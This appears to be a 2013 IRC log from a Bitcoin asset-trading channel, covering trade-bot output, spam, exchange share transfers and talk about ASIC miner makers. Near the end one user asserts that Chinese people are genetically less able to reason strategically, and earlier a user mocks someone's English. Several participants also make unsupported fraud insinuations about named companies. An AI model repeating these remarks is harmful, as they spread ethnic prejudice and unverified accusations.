nickserv info. To set one, see /msg nickserv help set email. Having a valid email is the only way to recover your password if you forget it. Thanks for flying freenode. Mar 03 18:38:51 -mrmist- [Global Notice] - As a followup to my last message, if you experience errors trying to update your email address right now, please try again later. Apparently 100s of email changes at once doesn't work so well.... Mar 03 18:58:04 thestringpuller: yes Mar 03 19:01:02 anyone aware of BTC-e having problems taking deposits? Mar 03 19:01:38 TO PLAY LOTTO BTC: http://www.lottobtc.com/ Mar 03 19:03:39 ^ spam detected.... Mar 03 19:35:14 [HAVELOCK] [HIM] 17 @ 1.56 = 26.52 BTC [-] Mar 03 19:40:22 spam detected Mar 03 19:49:18 mornin Mar 03 19:51:36 lottoBTC needs to be banned Mar 03 19:53:35 lottoBTC read chan rules and obey them, if you wish to stay. Mar 03 19:56:45 you can also pay me 1337 btc and ill leave you alone Mar 03 19:58:24 go with option B Mar 03 20:00:16 [BTCTC] [GSDPT] 100 @ 0.00591 = 0.591 BTC [-] Mar 03 20:00:18 [BTCTC] [GSDPT] 85 @ 0.0059 = 0.5015 BTC [-] Mar 03 20:04:21 good morning Mar 03 20:13:52 anyone know when the sdice dividend is going ot be paid? Mar 03 20:14:04 any day now Mar 03 20:15:09 Weird, I remember there was a list of exchanges in the topic, where is it? Mar 03 20:21:48 should be by tuesday the 5th i think Mar 03 20:23:04 kakobrekla: does bit4x provide a web interface for trading? I'm on Linux. Mar 03 20:23:08 [BTCTC] [COGNITIVE] 5 @ 0.29 = 1.45 BTC [-] Mar 03 20:23:47 Eduard_Munteanu, no, you need to use MT4, you can use it in virtual machine Mar 03 20:24:01 I see. Mar 03 20:24:48 I guess Wine might do too. Mar 03 20:25:31 hmm Mar 03 20:25:50 google says its possible but i havent tested how well it works under wine Mar 03 20:32:26 does MT4 have an API? Mar 03 20:33:17 well yea, it has an internal api Mar 03 20:33:24 you can code your stuff there with MQL Mar 03 20:33:31 ok cool Mar 03 20:33:54 i'm working on plugging different exchanges into a smart order router/virtual crossing engine Mar 03 20:35:42 i'm installing it now, to play around with it, looks like a cool piece of software Mar 03 20:36:47 looks like a really cool app, who do you set up an account with exactly? Mar 03 20:37:54 what do you mean? Mar 03 20:38:09 i open live accounts in btc denomination Mar 03 20:41:21 hi kakobrekla: http://live.coinbr.com/images/logofinal.png Mar 03 20:42:25 aka siren-maintained corporate identity xD Mar 03 20:45:34 its up http://bitcoin-assets.com/ Mar 03 20:50:54 lol, looks even better with these rounded corners Mar 03 20:51:05 :) Mar 03 20:51:16 shhhhs mp will hear you. Mar 03 20:52:20 Hm, what other broker is there for MPEx, other than nam's? Mar 03 20:52:35 hit f5 on bitcoin-assets Mar 03 20:52:38 .com Mar 03 20:52:40 lol Mar 03 20:52:55 Eduard_Munteanu: https://coinbr.com/ref?c=A3R7Tstq16 Mar 03 20:53:24 yup Mar 03 20:54:25 dub: thanks, I'll add you as a referral if I register Mar 03 20:56:15 gah what happened to rule 1 of -assets Mar 03 20:56:49 eggs bacon and spam. Mar 03 21:01:39 Hm, only 3 assets listed on coinbr? Mar 03 21:01:49 only 3 assets listed on mpex Mar 03 21:01:51 dude Mar 03 21:02:08 I see, I recall a few more on nam's. Mar 03 21:02:46 there are also options and futures Mar 03 21:02:56 Oh, nice. Mar 03 21:03:21 but were not so often trade to make this type of graph usable Mar 03 21:03:27 Hm, I suppose I can't see a list of assets until I deposit some BTCs? Mar 03 21:03:51 yes, new order screen is accessible only after initial deposit Mar 03 21:03:59 but it's the same list as mpex.co Mar 03 21:10:08 F*** the bast*** playing less than 2000 on SDICE... 2x 15 BTC to 955 BTC Mar 03 21:12:06 mirc won't let me list my touring polka band Mar 03 21:15:57 Why are those options so cheap? E.g. strike price 19USD/BTC, valued at 0.566 BTC. Mar 03 21:16:28 Err... Mar 03 21:16:46 Nevermind, I read USD instead of BTC. Mar 03 21:30:03 TO PLAY LOTTO BTC: http://www.lottobtc.com/ Mar 03 21:30:20 SPAM DETECTED Mar 03 21:31:59 yeah yeah Mar 03 21:33:17 got him! Mar 03 21:33:38 wtg bug Mar 03 21:40:37 what if i said the same thing Mar 03 21:41:10 TO PLAY LOTTO BTC: http://www.lottobtc.com/ Mar 03 21:41:11 every 5 mins and nothing else? Mar 03 21:41:29 oh that was the first one i saw Mar 03 21:42:08 it's a bot Mar 03 21:42:34 never try to reason with a robot Mar 03 21:43:09 1 BTC = 34.24860 U.S. dollars = 26.3086496 Euros Mar 03 21:51:25 Is it racist of me to ignore SebastianJu purely because I can't parse his linglinglish Mar 03 21:52:24 well not if you ignore his rase too Mar 03 21:58:20 lol Mar 03 22:01:25 [BTCTC] [S.DICE-PT] 150 @ 0.006 = 0.9 BTC [-] Mar 03 22:02:06 [BTCTC] [GSDPT] 150 @ 0.0059 = 0.885 BTC [-] Mar 03 22:03:51 Zedster, try btct for the polka band Mar 03 22:06:56 [MPEX] [S.MPOE] 7000 @ 0.00077843 = 5.449 BTC [+] Mar 03 22:07:32 [BTCTC] [BASIC-MINING] 2 @ 0.349 = 0.698 BTC [+] Mar 03 22:09:12 [BTCTC] [S.MPOE-PT] 1 @ 0.000745 BTC [+] Mar 03 22:11:02 [BTCTC] [S.MPOE-PT] 30 @ 0.00076 = 0.0228 BTC [+] Mar 03 22:11:44 [BTCTC] [S.MPOE-PT] 20 @ 0.00077 = 0.0154 BTC [+] Mar 03 22:12:06 [BTCTC] [S.MPOE-PT] 20 @ 0.00078 = 0.0156 BTC [+] Mar 03 22:13:38 [BTCTC] [S.MPOE-PT] 40 @ 0.00079 = 0.0316 BTC [+] Mar 03 22:13:40 [BTCTC] [S.MPOE-PT] 278 @ 0.00079 = 0.2196 BTC [+] Mar 03 22:18:54 heh just got expense report for a week long road trip with 5 friends last month Mar 03 22:19:58 more of a historic pub crawl, wine tour and whiskey binge Mar 03 22:20:14 [BTCTC] [RSM] 1 @ 0.00505 BTC [-] Mar 03 22:20:16 [BTCTC] [RSM] 70 @ 0.00504 = 0.3528 BTC [-] Mar 03 22:20:39 we spent $10003 Mar 03 22:21:44 not bad Mar 03 22:22:42 [BTCTC] [GSDPT] 1 @ 0.0059 BTC [-] Mar 03 22:40:11 finally about to break out of this channel Mar 03 22:42:48 the what? Mar 03 22:43:27 you cant do that. Mar 03 22:44:47 bugs gotta do whats bugs gotta do Mar 03 22:46:15 [HAVELOCK] [SDICE] 4 @ 0.6745 = 2.698 BTC [+] Mar 03 22:53:47 taser sword https://www.youtube.com/watch?feature=player_embedded&v=0F-VVjqarZE#! Mar 03 22:59:40 amurica fuck yeah Mar 03 23:00:38 comment win: Occams Taser 3 minutes ago Now try building yourself a girlfriend... Mar 03 23:00:49 I still want taser brass knuckles Mar 03 23:01:32 1 BTC = 34.34800 U.S. dollars = 26.3850054 Euros Mar 03 23:01:59 Diablo-D3: beserker punch doom style Mar 03 23:02:12 berserker* Mar 03 23:02:26 [MPEX] [S.DICE] 1000 @ 0.00550004 = 5.5 BTC [-] Mar 03 23:02:28 [MPEX] [S.DICE] 700 @ 0.00550003 = 3.85 BTC [-] Mar 03 23:02:39 [MPEX] [S.DICE] 700 @ 0.0055 = 3.85 BTC [-] Mar 03 23:03:15 pre-divs sale goes on Mar 03 23:03:26 dub: the only thing I remember from doom is the fucking lobster claw Mar 03 23:08:39 I wish I could short. Mar 03 23:08:49 The market is so reactive Mar 03 23:08:57 rather than proactive Mar 03 23:17:55 [BTCTC] [BTC-BOND] 6 @ 0.00999 = 0.0599 BTC [+] Mar 03 23:18:18 I wish I was a little bit shorter, wish I wasnt a baller, wish I had a girl who looked bad, I wouldnt call her? Mar 03 23:19:36 wish I had usagi in a hat with a bat and a '84 skoda Mar 03 23:22:06 mtgox x85 0.0675 Mar 03 23:22:07 wat Mar 03 23:25:19 mtgox x110 0.0338 Mar 03 23:25:38 the fuck is going on Mar 03 23:25:39 [MPEX] [S.MPOE] 1150 @ 0.00076889 = 0.8842 BTC [-] Mar 03 23:25:40 [MPEX] [S.MPOE] 21495 @ 0.00077069 = 16.566 BTC [+] Mar 03 23:26:08 we gettin goxxed Mar 03 23:27:35 [MPEX] [S.DICE] 500 @ 0.0055001 = 2.7501 BTC [+] Mar 03 23:42:29 ;;estimate Mar 03 23:42:30 Next difficulty estimate | 4663223.55823 based on data since last change | 4470188.64953 based on data for last three days Mar 03 23:48:46 iDiff-E selling for 6.1 now for beliebers ;) Mar 03 23:49:16 *no, it's iDiff-O March Mar 03 23:49:24 1 BTC = 34.36999 U.S. dollars = 26.4018974 Euros Mar 03 23:51:52 First backed asicminer shares trading live Mar 03 23:51:53 https://bitfunder.com/asset/G.ASICMINER-PT Mar 03 23:55:23 backed Mar 03 23:56:13 backed Mar 03 23:58:13 strangely that word (as much as it is worth) doesn't appear in the profile Mar 04 00:00:08 Shares total: 1 bajillion/Shares Issued: tiny fraction/Issuer may arbitrarily manipulte share value: yes Mar 04 00:01:56 it states that all shares are verified with friedcat Mar 04 00:02:00 but your right Mar 04 00:02:05 I will get that changed Mar 04 00:02:10 terra went to be already tho -_- Mar 04 00:07:34 [BTCTC] [S.BBET-PT] 1 @ 0.00208 BTC [-] Mar 04 00:07:36 [BTCTC] [S.BBET-PT] 15 @ 0.002 = 0.03 BTC [-] Mar 04 00:07:38 [BTCTC] [S.BBET-PT] 84 @ 0.0019 = 0.1596 BTC [-] Mar 04 00:08:23 [BTCTC] [S.DICE-PT] 100 @ 0.0059 = 0.59 BTC [-] Mar 04 00:09:59 Any public votes presented by ASICMINER to all shareholders of ASICMINER may be voted on BitFunder towards a single decision by the G.ASICMINGER-PT shareholder account. Mar 04 00:10:18 Ukto either there will be voting support or someone is due for a headache? Mar 04 00:11:24 [BTCTC] [S.DICE-PT] 500 @ 0.00581 = 2.905 BTC [-] Mar 04 00:14:16 well Mar 04 00:14:23 supposedly there will be no public votes Mar 04 00:14:28 but just in case Mar 04 00:14:31 that was put in Mar 04 00:16:59 [MPEX] [S.DICE] 3147 @ 0.00599998 = 18.8819 BTC [+] Mar 04 00:17:01 [MPEX] [S.DICE] 1853 @ 0.00599999 = 11.118 BTC [+] Mar 04 00:17:18 better to just say shares have no voting rights Mar 04 00:17:32 cuz trolls will be trolling inevitably Mar 04 00:18:13 [HAVELOCK] [SDICE] 10 @ 0.624 = 6.24 BTC [-] Mar 04 00:18:15 [HAVELOCK] [SDICE] 24 @ 0.6235 = 14.964 BTC [-] Mar 04 00:18:16 [HAVELOCK] [SDICE] 10 @ 0.6221 = 6.221 BTC [-] Mar 04 00:18:17 [HAVELOCK] [SDICE] 6 @ 0.621 = 3.726 BTC [-] Mar 04 00:18:45 OT: if anyone uses postgres, i recommend: http://postgres-bits.herokuapp.com . several things blew me away, like, it can store dictionaries Mar 04 00:19:25 natively Mar 04 00:19:36 and query them Mar 04 00:22:04 [BTCTC] [GSDPT] 1000 @ 0.0059 = 5.9 BTC [-] Mar 04 00:24:13 [HAVELOCK] [HIM] 2 @ 1.41 = 2.82 BTC [-] Mar 04 00:25:14 [HAVELOCK] [HIM] 3 @ 1.4 = 4.2 BTC [-] Mar 04 00:36:19 [BTCTC] [S.MPOE-PT] 30 @ 0.000789 = 0.0237 BTC [-] Mar 04 00:37:14 [HAVELOCK] [SDICE] 6 @ 0.621 = 3.726 BTC [-] Mar 04 00:51:11 [BTCTC] [GSDPT] 19 @ 0.0058 = 0.1102 BTC [-] Mar 04 00:51:13 [BTCTC] [GSDPT] 100 @ 0.00572 = 0.572 BTC [-] Mar 04 00:51:15 [BTCTC] [GSDPT] 31 @ 0.00571 = 0.177 BTC [-] Mar 04 00:52:20 [BTCTC] [B.YABMC] 100 @ 0.00799 = 0.799 BTC [-] Mar 04 01:06:59 [BTCTC] [S.BBET-PT] 100 @ 0.002129 = 0.2129 BTC [+] Mar 04 01:09:30 anyone want to test pushing units from mpex to havelock? Mar 04 01:09:58 is it free? Mar 04 01:10:07 i dont even have havelock acc thb Mar 04 01:10:09 tbh Mar 04 01:10:25 yup its free Mar 04 01:10:35 this is for arb or what? Mar 04 01:10:51 yea, to allow others to get in on the mpex->havelock arbitrage Mar 04 01:11:02 cute Mar 04 01:11:38 1) push shares to my fingerprint Mar 04 01:11:39 Cool. Mar 04 01:11:43 2) paste receipt into havelock website Mar 04 01:11:58 3) i manually approve transfer (for now) Mar 04 01:12:08 once im sure its working well, ill remove the manual transfer Mar 04 01:12:17 or, only require it on very large transfers Mar 04 01:12:32 hmmm Mar 04 01:12:54 i mean the question here is y u open this at all Mar 04 01:13:01 you could just automate it Mar 04 01:13:03 i mean Mar 04 01:13:04 the arb Mar 04 01:13:49 no? Mar 04 01:13:54 yea, i could Mar 04 01:14:26 well there some money on the table Mar 04 01:14:41 theres* Mar 04 01:15:44 i think there needs to be a way for people to freely move shares between mpex and the passthru's and maybe even between the passthrus themselves Mar 04 01:16:20 ok imma gonna try this Mar 04 01:16:25 lets register Mar 04 01:18:44 [BTCTC] [S.MPOE-PT] 455 @ 0.00072 = 0.3276 BTC [-] Mar 04 01:18:55 cool thanks Mar 04 01:20:21 Receipt is valid Mar 04 01:20:21 Your request to push 1000 unit(s) of S.DICE to Havelock Investments has been received. Push requests are currently processed manually (so expect 1-48 hours processign time), but will be automated in the future. Mar 04 01:20:25 passthru Mar 04 01:21:37 hai. Mar 04 01:22:37 [BTCTC] [S.BBET-PT] 500 @ 0.00213 = 1.065 BTC [+] Mar 04 01:22:41 topace_ where are ze shares? :p Mar 04 01:22:46 kakobrekla: approved. should show in your account now Mar 04 01:22:53 refresh portfolio page Mar 04 01:22:59 aha ok i see something Mar 04 01:23:05 [BTCTC] [S.BBET-PT] 935 @ 0.0022 = 2.057 BTC [+] Mar 04 01:24:15 hi kakobrekla: http://live.coinbr.com/images/logofinal.png ?<< haha cool Mar 04 01:24:38 hmm wonder what its showing for your book value? obviously it wont be able to calculate that... Mar 04 01:25:12 [BTCTC] [S.BBET-PT] 2 @ 0.00249 = 0.005 BTC [+] Mar 04 01:25:14 [BTCTC] [S.BBET-PT] 10 @ 0.00249 = 0.0249 BTC [+] Mar 04 01:25:16 [BTCTC] [S.BBET-PT] 497 @ 0.0025 = 1.2425 BTC [+] Mar 04 01:25:57 seems i didn't miss much huh Mar 04 01:26:10 kakobrekla: umm somethings wrong tho. Mar 04 01:26:16 my multiple is off Mar 04 01:26:17 lol Mar 04 01:26:20 hey yeah Mar 04 01:26:23 it should have given you 10 shares, not 100 Mar 04 01:26:24 i was just wondering Mar 04 01:26:24 haha Mar 04 01:26:32 says 100 on the contract Mar 04 01:27:11 still no bbet tho ? :p Mar 04 01:28:55 think i might add bbet this week Mar 04 01:28:59 and mpoe as well Mar 04 01:29:13 the recent tx still shows 100 Mar 04 01:29:45 just fixed that too Mar 04 01:29:52 kk Mar 04 01:30:01 well at least there was nothing wrong with the code, i just had the multiple set wrong. Mar 04 01:30:16 no way to push back now? Mar 04 01:30:28 i mean automagic or smth Mar 04 01:30:41 not yet... but thats the easier of the two to code Mar 04 01:30:50 give me your fingerprint and ill push em back Mar 04 01:31:00 [MPEX] [S.MPOE] 9400 @ 0.00077069 = 7.2445 BTC [+] Mar 04 01:31:28 push it push it Mar 04 01:31:58 http://www.youtube.com/watch?v=vCadcBR95oU Mar 04 01:32:00 its ok, ima gonna leave em there Mar 04 01:32:06 oh okay :) Mar 04 01:32:36 ill add the push back form probably tomrrow or tuesday Mar 04 01:33:05 it'll be a push request, and manually approved on my side, same as the push in request.. at least until im sure its working 100% Mar 04 01:33:18 cool Mar 04 01:33:44 gotta go vacuum now, or gf will kill me when she gets home Mar 04 01:33:48 ttyl Mar 04 01:33:52 enjoy Mar 04 01:35:22 that;s so backwards... Mar 04 01:36:01 first pusing off mpex now cleaning before the lady gets home Mar 04 01:36:05 endoftheworld.swf Mar 04 01:36:49 lol Mar 04 01:37:38 ;;ticker Mar 04 01:37:39 BTCUSD ticker | Best bid: 34.40001, Best ask: 34.50000, Bid-ask spread: 0.09999, Last trade: 34.40001, 24 hour volume: 12439.22704040, 24 hour low: 33.80000, 24 hour high: 34.50000, 24 hour vwap: 34.12774 Mar 04 01:38:31 next door at -otc, litecoin fpga firmware is cooking Mar 04 01:38:49 "dont fpgas go out of style as fast as CPUs do?" Mar 04 01:39:02 i thought litecoin was like all cpu Mar 04 01:39:11 Mar 04 01:39:57 just because it needs much memory. if someone figures out how to hook memory to fpga and make it fast...sky is the limit Mar 04 01:43:14 [HAVELOCK] [SDICE] 5 @ 0.6216 = 3.108 BTC [+] Mar 04 01:43:38 and on -dev they took on to optimize satoshidice, again :) Mar 04 01:48:09 heh. Mar 04 01:53:06 i wonder why i haven't seen the idea of applying hashcash to *every* transaction Mar 04 01:53:45 like, tx won't be accepted if you didn't some little hashing yourself Mar 04 01:53:59 jurov ask them when are they gonna actually get crackin on the actual problems http://trilema.com/2013/bitcoind-not-quite-ready-for-prime-time/ Mar 04 01:54:19 buncha fuckwits Mar 04 01:54:21 asked about that yest Mar 04 01:54:28 aha ? and ? Mar 04 01:54:45 can't remember any concrete outcome Mar 04 01:55:26 some discussion about optimized choosing of unspent outputs at most Mar 04 01:57:42 i guess you'll end up having to defragment the bitbet wallet occassionally Mar 04 01:57:58 to prevent situations Mar 04 01:58:06 so why the fuck are they fixing other people's problems Mar 04 01:58:09 jesus christ these dudes. Mar 04 01:58:26 "o, what needs to be done is too hard, o, we're too stupid, let's do something else instead" Mar 04 01:58:30 psccccchhhh Mar 04 01:59:49 lol, i have to make closed source wallet defrag tool.. and sell it for 1BTC. or at least accept donations Mar 04 02:00:42 and have the same dorks whine about how you're ruining bitcoin Mar 04 02:00:44 which they broke Mar 04 02:01:05 i strongly suspect the reason satoshi made himself scarce was that he was getting sick of dealing with the current team of devs. Mar 04 02:03:13 [HAVELOCK] [SDICE] 7 @ 0.6216 = 4.3512 BTC [+] Mar 04 02:04:16 https://bitcointalk.org/index.php?topic=131012.0 Mar 04 02:04:22 aww they got chunge guy Mar 04 02:05:14 [HAVELOCK] [SDICE] 1 @ 0.6197 BTC [-] Mar 04 02:07:10 mhm Mar 04 02:07:14 LTC went up to 10 cents Mar 04 02:08:15 lmao wait. waitwait. Mar 04 02:08:19 Cloudflare was down ?! Mar 04 02:08:23 ahahahaha Mar 04 02:15:19 BTW, how do you manage shares traded on your exchange? I hear asicminer people had to do some manual bookkeeping. Do you keep an exchange-local tab? Mar 04 02:15:53 But then I suppose you can't trade shares outside the exchange. Mar 04 02:16:20 Eduard_Munteanu, you asking mircea? Mar 04 02:16:26 Anyone. :) Mar 04 02:16:34 he already admitted he has girls for that Mar 04 02:16:40 Heh. Mar 04 02:17:17 and yes, the shares don't go outside exchange. this is why we have all these passthroughs Mar 04 02:17:40 an exchange is an exchange, it has a trade engine Mar 04 02:17:46 Ideally shares could work like BTC, I wonder if that's possible. Mar 04 02:17:46 what friedcat is doing is inhuman Mar 04 02:17:50 but i guess people gotta try it out. Mar 04 02:18:09 Eduard_Munteanu that's not ideal. it's actually a bad idea. the horse has been discussed to death Mar 04 02:18:32 Hm. Mar 04 02:19:13 [HAVELOCK] [SDICE] 5 @ 0.61 = 3.05 BTC [-] Mar 04 02:19:26 But isn't there a crypto way to accomplish the same thing, perhaps different than BTC? You still need exchanges. Mar 04 02:20:05 If this has been discussed on the forums, I'd be glad to read those threads. Mar 04 02:21:40 Unlike BTCs, shares are by definition centralized I suppose. Mar 04 02:21:52 At least wrt how they're issued. Mar 04 02:25:54 http://trilema.com/2013/why-i-nixed-p2p-colored-coins-and-all-that-jazz/ Mar 04 02:27:58 http://polimedia.us/dtng/c/src/135778037437.png lmao deliciouscake Mar 04 02:30:06 Hm, makes sense, reading... thanks. Mar 04 02:30:52 Bitcoin Pride Stats Mar 04 02:30:52 Feb 2013: Income: $2,200 USD Profit: $1,186.00 USD Mar 04 02:30:52 (Selling was halted during the month of Feb. to change payment methods.) Mar 04 02:30:52 Jan 2013: Income: $3,270 USD Profit: $2,218.35 USD Mar 04 02:30:52 Dec 2012: Income: $4,521.75 USD Profit: $3,784.00 USD Mar 04 02:30:52 Bitcoin pride averages a 70% profit. Don't you want a piece of the pie too? Mar 04 02:31:01 wait, their income went from 4.5 to 3.2 then 2.2 ?! Mar 04 02:31:13 who was saying they've eaten up their market earlier ? they had a point it seems Mar 04 02:32:42 so they're losing money each month? Mar 04 02:34:26 well, losing incom Mar 04 02:34:33 still showing a (growing) profit Mar 04 02:34:39 i've never seen that sort of dynamic before. Mar 04 02:36:04 hm Mar 04 02:36:06 mircea_popescu: I see the problem. Still, wouldn't an exchange / market-maker be able to eliminate all those delays for things traded within the exchange? Not sure how one'd deal with double spending if you don't wait for confirmations. Mar 04 02:36:32 the formula it seems is Income( rand() ) - 1 grand = profit Mar 04 02:37:31 Eduard_Munteanu by keeping a central book, obviously. Mar 04 02:37:49 kakobrekla unless the sqrt log guy has a better solution, i think you're spot on. Mar 04 02:37:57 ;)) Mar 04 02:38:40 mircea_popescu: yes. And committing changes to the blockchain periodically. The exchange is still pretty important, but at least you can move stuff between exchanges in a standard way. Mar 04 02:38:50 you ALREADY can do that. Mar 04 02:39:03 mpex issues push receipts. Mar 04 02:39:03 Hm. Mar 04 02:40:31 Actually yeah, that kinda solves the entire issue. Mar 04 02:40:50 Not sure about OTC trading, but presumably you could do it manually somehow. Mar 04 02:41:00 Using your receipts. Mar 04 02:41:20 if you can do it automatically like topace is trying you necessarily can do it manually too Mar 04 02:41:56 Indeed. Mar 04 02:45:15 the way asicminer is playing this game makes me scratch my head. Mar 04 02:45:41 so they're pointedly not coming to be listed on mpex, jump through the hoops and get my ok. Mar 04 02:45:56 instead they're waiting for btct/bf/others run passthroughs Mar 04 02:46:01 obviously there's no contract involved there. Mar 04 02:46:14 now what happens if six months down the road friedcat pulls a gigavps ? Mar 04 02:46:36 Ukto, burnside and whoever else involved gets scammer tags ? or what ? Mar 04 02:47:49 You're saying they're intentionally delaying listing on MPEx? Mar 04 02:48:22 i'm saying they're either through sheer incompetence, sheer lack of resources or by actually being frauds behave just like a fraud would. Mar 04 02:48:39 maybe i'm not understanding something. Mar 04 02:49:42 IDK, getting listed should've been negotiated even before the IPO, in my opinion. People have to have some way to buy / sell those stocks easily. Mar 04 02:50:30 sure. Mar 04 02:50:39 moreover, they've liquidity-trapped their "investors" Mar 04 02:50:45 Yeah. Mar 04 02:50:48 which is something you really don't want to do Mar 04 03:07:29 whats liquidity? Mar 04 03:08:15 sound slike something to do with selling shares Mar 04 03:08:23 which is, as we know, not how you invest! Mar 04 03:09:08 o ok Mar 04 03:09:13 welcome back among the living Mar 04 03:16:30 https://bitcointalk.org/index.php?topic=130947.msg1576297#msg1576297 Mar 04 03:16:40 wow, eskimobob actually published a readable balance. Mar 04 03:18:06 wat Mar 04 03:19:29 oh right, where he lists bitcoins: he is counting litecoins Mar 04 03:23:16 converted at an unspecified rate etc.\ Mar 04 03:24:26 still, i had no idea ltc tanked that bad in btc Mar 04 03:25:28 yeah as btc was going up, ltc was going down to track the dollar and stay at .07 usd rather than stay at a ratio to btc Mar 04 03:26:26 otoh lct seems all set for bubble territory. Mar 04 03:26:33 bfl realy do deserve some kind of award Mar 04 03:26:35 since btc folks love a good bubble... Mar 04 03:27:10 they should be held up as a shining example of how to fail at pr Mar 04 03:27:23 nah, coinlab is the shining example of how to fail at pr. Mar 04 03:27:44 we brought bitcoin to wall street in silicon valley Mar 04 03:27:50 "drunk whore stumbles into wallstreet bar, announces she's brining the clap to wall street" Mar 04 03:28:26 im not sure if hiring inaba or letting your userbase add content at a yourdomain.com/blog/ url IS DUMBER Mar 04 03:28:58 it took quite a few moments to decipher that I was not actually reading an official bfl blog Mar 04 03:29:03 hm Mar 04 03:29:11 truth be told those are pretty good too Mar 04 03:29:17 ah, so much fail, so hard to pick a winner Mar 04 03:30:22 sooo, three chicks drank four liters of vodka in two days. Mar 04 03:30:31 what the fuck is this, dnipopetrovsk ?! Mar 04 03:32:27 I should delve into this road trip expenses sheet Mar 04 03:32:51 hey, was it like 10k ? Mar 04 03:33:11 yes, 6 people, 6 days, 10k Mar 04 03:33:17 list it Mar 04 03:33:19 LTC-BARF Mar 04 03:33:30 apparently we have a new ASIC company that is ready to ship Mar 04 03:33:38 about the same size as eskimo's thing Mar 04 03:33:47 this one's from hungary Mar 04 03:33:47 Bowjob which one is that ? Mar 04 03:33:49 where can i place a bet that coinlab will be out of business by end of year? Mar 04 03:33:56 PrimeAsic Mar 04 03:34:05 https://bitcointalk.org/index.php?topic=148832.0 Mar 04 03:34:08 BitHub on bitbet, if you can well define out of business Mar 04 03:34:19 iirc jurov tried Mar 04 03:34:29 well maybe not out of business Mar 04 03:34:35 what i want to bet on this being a huge fail Mar 04 03:35:22 theres only $633 worth of whiskey listed here, I don't think thats accurate Mar 04 03:35:43 hm, actually hungary, might be worth a visit. Mar 04 03:35:45 I recall at least 4 bottles that where brought from home Mar 04 03:36:28 oh that's cool Mar 04 03:36:35 wish i live near hungary Mar 04 03:36:36 if its legit, I'll fly over there to pick a couple of them Mar 04 03:36:43 i would sell my car today and go get one tomorrow Mar 04 03:36:48 I don't know the price yet Mar 04 03:37:21 i could be in budapest literally by sunup Mar 04 03:37:30 but meh... worth it ? Mar 04 03:37:59 ~300 km awai Mar 04 03:38:42 really? Mar 04 03:39:44 yes really. Mar 04 03:39:58 that's why i live here, it's close to shit. Mar 04 03:40:18 i live in a fuck hole Mar 04 03:40:26 where everything is expensive Mar 04 03:40:32 sucks. move to yurp Mar 04 03:40:39 i'm trying Mar 04 03:40:39 mircea_popescu: I thought it was teh lion/bear licesning regime Mar 04 03:41:00 dub huh ?! Mar 04 03:41:02 :D Mar 04 03:41:06 http://newsfeed.time.com/2013/02/27/lions-bears-removed-from-romanian-gangsters-property/ Mar 04 03:41:06 couch Mar 04 03:41:12 lmao Mar 04 03:41:27 I heard that on the radio a few days ago, first thought 'wonder if mp shows up on irc today' Mar 04 03:41:34 better not touch my pet tiger Mar 04 03:42:03 lol Mar 04 03:42:11 the idea that you need a permit for stuff is certainly new here Mar 04 03:42:15 what the fuck, permits. Mar 04 03:43:23 bit of a long shot but would anyone be able to help me out and send one of those to Australia? Mar 04 03:44:28 this stuff is a mess to export Mar 04 03:44:44 yeah thats true Mar 04 03:44:53 customs will probably take it and start mining themselves Mar 04 03:44:55 pricks Mar 04 03:45:13 yeah Mar 04 03:47:27 mircea_popescu: You are beginning to see some of the strange contradictory nature of the asicminer people, I think, that I've been complaining about for months. Mar 04 03:47:47 midnightmagic perhaps. what specifically ? Mar 04 03:48:30 o, asicminer not asic miners. yeah. Mar 04 03:49:00 why is it a mess to export? Mar 04 03:49:27 its a computer, we have been shipping these around the place for a wee while now Mar 04 03:49:38 dub ya well, maybe it's a bomb Mar 04 03:50:12 customs can test for bombliness Mar 04 03:50:44 maybe it's a nuclear bomb producing item Mar 04 03:50:57 maybe it'll fuck their mothers. Mar 04 03:51:15 mircea_popescu: You mentioned earlier that they are behaving fraudulently-like.. This is permeating more than just the way they are handling their stocks, but elsewhere as well, and it's troubling because unethical people in their position, could conceivably have done a much larger order to start with than what they are reporting, and the attraction of doing double-spends is quite large if, indeed, the evidence is correct when Mar 04 03:51:21 it points to short-term thinking. Mar 04 03:52:02 midnightmagic well, i don't know the whole thing, but from this angle it looks more like they're clueless/haven't been thinking things through/haven't slept in weeks Mar 04 03:52:16 tho its quite possible they're ill intended too, sure. Mar 04 03:52:30 mircea_popescu: I would be very interested to hear from you if you discover that they aren't just clueless, but seemingly deliberately clueless. Mar 04 03:52:42 they are chinese Mar 04 03:52:47 Or if you begin to make observations that suggest it is not pure ignorance. Mar 04 03:52:47 i'll certinly say something Mar 04 03:53:03 but so far my belief is they just don't understand finance Mar 04 03:53:06 which is in fact common so. Mar 04 03:53:20 dub: And yet ngzhang is one of the most ethical businesspeople I've seen in a long time. Mar 04 03:53:34 i dun think chineseness has much to do with anything Mar 04 03:53:37 midnightmagic: I'll assume you're being facetious? Mar 04 03:53:41 dub: Being Chinese doesn't really mean much. Mar 04 03:53:51 dub: I am not. ngzhang is extremely ethical, or else Icarus wouldn't exist. Mar 04 03:54:00 lets deal with teh first question, my mind is somewhat boggling Mar 04 03:54:05 there's plenty of scummy americans, iranians, turks and eskimos in this world Mar 04 03:54:11 and plenty of trustworthy same etc. Mar 04 03:54:17 mircea_popescu: Eskimos don't like being called Eskimos. :) Mar 04 03:54:23 lol Mar 04 03:54:32 well whatever, inuits. northern russian people. Mar 04 03:54:36 midnightmagic: this is the the same dude involved in avalon right? the 'we shipped' guy Mar 04 03:55:42 dub: The "we shipped and they're sitting in customs at the beginning of CNY." and also , "Geez, with all this negativity, maybe we'll just be quiet until there's actually something to talk about." guys.. Mar 04 03:56:52 dub: Also the latest update, "Rest of the units will have been shipped by around Mar 10, everyone should have batch #1 in hand by about mid-March" people. Mar 04 03:57:38 pitty they're not 'here are the tracking numbers' people though really Mar 04 03:58:09 anyway, being chinese decreases ones ability to think strategically and reason counterfactually Mar 04 03:58:33 this is a genetic/language thing thats been done to death Mar 04 03:58:38 ... I can't actually tell if you're serious. Mar 04 03:59:07 If you're jerking my chain, your delivery is too dry. Mar 04 03:59:18 im not, try meeting some chinese people Mar 04 03:59:33 I hear there are a couple up your way Mar 04 04:00:40 And how do you know I'm not Chinese origin? Mar 04 04:01:26 we'll I don't but based on past discussions I think its rather unlikely Mar 04 04:01:46 you are far too empathetic for one Mar 04 04:03:00 https://twitter.com/BitBets Mar 04 04:03:03 https://twitter.com/BitBetsBets Mar 04 04:03:04 dub: I'm at a loss here to meaningfully discuss this with you. I don't know where to start. If you're serious, I'm fairly sure we are so alien that there is basically no common ground on which to meaningfully converse for this topic. Mar 04 04:03:05 fyi Mar 04 04:03:07 anyway, if you remove any racist overtones you have automatically inferred, it explains a lot about the comms we've seen from avalon and asicminer Mar 04 04:03:10 